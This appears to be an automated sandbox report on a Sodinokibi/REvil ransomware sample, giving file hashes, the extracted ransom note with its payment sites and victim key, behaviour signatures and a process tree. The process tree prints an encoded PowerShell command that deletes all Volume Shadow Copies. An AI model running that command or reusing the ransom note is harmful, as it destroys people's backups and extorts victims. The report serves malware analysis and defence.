Analysis

  • max time kernel
    131s
  • max time network
    147s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28-09-2024 13:26

General

  • Target

    fc64a21fc60e4647ce3023be30ffbfc8_JaffaCakes118.exe

  • Size

    164KB

  • MD5

    fc64a21fc60e4647ce3023be30ffbfc8

  • SHA1

    5ccc20e535890ffddbd6a97fe28acb5c86e690d9

  • SHA256

    bb049db0101997e4ec714413c716b9f5e0bfd342e20d1b01b1406a648a9b8033

  • SHA512

    6f5353f372a63b24ebf8e4ef2d490b22e9ad2f32a93a0ef2803ca8a16eea878860edfce5a79afd7975e3fa4cc737c4d74bea0393ecc0ac9507f9615598dedb80

  • SSDEEP

    3072:70XoUeZ/DVS8L7flcMTeYWikGLvFfwZ4ib5D:7eoUeZRlcYxWYTFfwZV

Malware Config

Extracted

Path

C:\Users\l387h727g-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion l387h727g. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/3FBEE749ECBECB68 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.top/3FBEE749ECBECB68 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: 81vLzahGQ0jWVly1xG3Vv3JAnheYxWGnJ6/rmNSuVNuQZ1+TajIoysff4T2t9ZOk qRbN2VbkUikuHcsPCo3RGOZPGmZ2SVi3H8zmzSwImU9e5fBDwpcA3/aoBibOHMdL Gbs72q88r9WR0d9+NoCRSFnmIKQtxzdiGQ4eJkhGVvEhYTscvbi3dyFRRnLy7vak M27aFwoXsJfRYSnXqEvQkNMMBMKW1438mNvIdq40VA7Tj3RK4nNIjCraAaAIBS5S YtpzDtdVdL95bTYVyVFsvXf7fx6AW+Jf3sQTBZTeaWjJjl8iDBoJYMKIuNR8v0Ei hQkdPAU+GlvaJLGHO8M6bSucVUed54LG32cxTQApXZGNzgP8HXp3Oe7OeDOrFJqL +N0JvGce9SJgOfT9t7Ewue3DwKka/IEkgpLD2cfo0CN4pkaioi2n0T+3in64vpYq yiBTgyhjLBhnqy5Y7PKS+jxaDlHIQ1rmtIrYECKxwxptlGUpsUs46xtDApVIQNEJ oTEz1wdnvT+kh2o/WaO8mqcv8y7ji46X5eY/fHmbsdI1M++6tycYrItZuDgqpTjU Atc/rtfH68F74yIkJT53oSBdbIHOgNf/MRRZAE16ZKv43cZHJzh2DlT6dG2Ts/yK TGyuqtC9WdOlwEIakoapdMEdsTWmY+HHjayYE2FHzcR8SLMLpSfy/02fhb54b1iX gYEZ3vIfrDmGmMX3jFRBCN3MqiTNH+wCofL3fH50PPPf7Vf0pmp1Ym3p6PeIMOKi hX2Q6geVkw+V4VQHRc118xEHHwjaWfbPNohJM1h2WzntaV2TGMieuooP5sZPWriJ bJVNIdUa/PEsxpqzmwrYiibVr+GxKYYyfGL2nXdSW9BNtP99S7o20Eo5skbEfjVj OR8qgFXku+KMGcPFdQ7kLNqBomu+9yS4ecek/fjS5bpg02jCm8g1nfjmeDMUoPow qp8oby2HZbV8BDIk6lJkaURO5glN4ncdO/JgNqUzmSe2uEMYMP81+3AWrRNHpO41 jFGfDdAqh5Hneh+spFvcDt/AvoGR7jyccUc9wBhsIioEMroHK/uz4IAWh+KTSQbi m+ZPa1O9Jynb66GvMN+CHnBCTlD2ifOnYlHSxEnxTXU1qqA6eR1tsYdirnxZTb4v ieY3rOzHzDVuOvZmZGm0Nu7pOjjtpUWvi3OHqtosiA4N+IoMxD/ZQQ99BqFqpy9j xF2I4y0vgmTFWN06hpYU3hLvW24= Extension name: l387h727g ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/3FBEE749ECBECB68

http://decryptor.top/3FBEE749ECBECB68

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 23 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies system certificate store 2 TTPs 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\fc64a21fc60e4647ce3023be30ffbfc8_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\fc64a21fc60e4647ce3023be30ffbfc8_JaffaCakes118.exe"
    1⤵
    • Adds Run key to start application
    • Enumerates connected drives
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • System Location Discovery: System Language Discovery
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1188
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:224
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:3580
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1604

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xlf4abii.pvn.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\l387h727g-readme.txt

      Filesize

      6KB

      MD5

      9433fc238d1bf71836121633e5959d25

      SHA1

      a24183b33fd39da9447cca0067e06a2185cb2e7b

      SHA256

      6473ea71f0be5986d74c65d8879f4184c07e03ef6ee6ea68c54d08d480efe073

      SHA512

      0db5ecc222875e2b80d4c74ad954f08e1bb1e930e88387df9d19d03e34cd58f37533167accbd842eb1862d60fdc0625ea5b46b2d9f8271f8ac96be017a890b1c

    • memory/224-0-0x00007FFDE9593000-0x00007FFDE9595000-memory.dmp

      Filesize

      8KB

    • memory/224-10-0x000001E231050000-0x000001E231072000-memory.dmp

      Filesize

      136KB

    • memory/224-11-0x00007FFDE9590000-0x00007FFDEA051000-memory.dmp

      Filesize

      10.8MB

    • memory/224-12-0x00007FFDE9590000-0x00007FFDEA051000-memory.dmp

      Filesize

      10.8MB

    • memory/224-15-0x00007FFDE9590000-0x00007FFDEA051000-memory.dmp

      Filesize

      10.8MB